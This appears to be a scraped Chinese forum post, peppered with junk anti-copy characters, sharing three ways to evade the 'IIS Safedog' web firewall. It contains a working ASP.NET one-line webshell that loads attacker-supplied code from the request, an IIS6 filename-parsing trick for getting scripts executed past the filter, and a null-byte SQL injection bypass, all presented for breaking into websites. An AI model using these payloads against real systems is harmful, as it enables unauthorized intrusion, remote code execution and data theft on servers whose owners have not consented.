1、绕过IIS安全狗的一句话。 Z9 S$ V) q3 c2 q' C2 ]
前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。4 q* h. g, g) e, k% A/ ]
<%@ Page Language="C#" ValidateRequest="false" %> <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["admin163.net"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null,null); } catch { }%>连接端用cncert的aspx一句话客户端。
: b) b" \: ^, {8 w7 }+ L W' C
2、IIS6.0解析漏洞遇到安全狗。3 `: b4 d: h5 q7 E0 R
文件名为
: w- A6 ?, F! F- K) r. [: z: Phttp://www.xxxxx.com/sh3llc0de.asp;1.jpg
* v3 t( g3 P+ e. m8 l* M, b" m$ F. v6 j c1 N6 J
这样的会被IIS安全狗果断屏蔽。
; J! I$ D& a8 Z; O4 a3 R7 Z1 i改成如下名称,IIS6一样会解析:
! M/ u3 q" v, `1 ^9 |' Nwww.xxxxx.com/;1.asp;1.jpg
( U' F# i% I5 P. }" @8 o1 P# ?" d+ O1 T
& R9 N7 Z& N1 _4 w3、安全狗的注入绕过。
# H& c, @2 W/ U常用的如r00ts.asp?id=1 and 1=1 是会被安全狗屏蔽的。6 N: `! e3 c. B% A7 K8 f y
但如果:
; ^% Z& H/ N4 Gr00ts.asp?r00ts.com=%00.&id=69%20 and 1=1+ _$ A8 y, Q5 [" i# M' q
就可以成功绕过了。1 U/ x4 n% w9 u7 T
- M K" F1 W% |# [, D
8 R6 E% b' ?! y( Z- f8 T% h |